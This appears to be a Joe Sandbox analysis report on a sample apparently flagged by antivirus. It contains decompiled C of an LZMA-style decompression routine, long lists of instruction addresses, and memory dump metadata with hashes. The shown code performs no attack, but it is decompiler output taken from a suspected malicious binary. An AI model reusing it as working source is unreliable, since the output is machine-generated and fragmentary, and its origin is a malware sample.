												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x00407030
                                                                                    0x00407036
                                                                                    0x00407048
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407004
                                                                                    0x0040700a
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004073ce
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407002

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                    • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                    • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                    • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
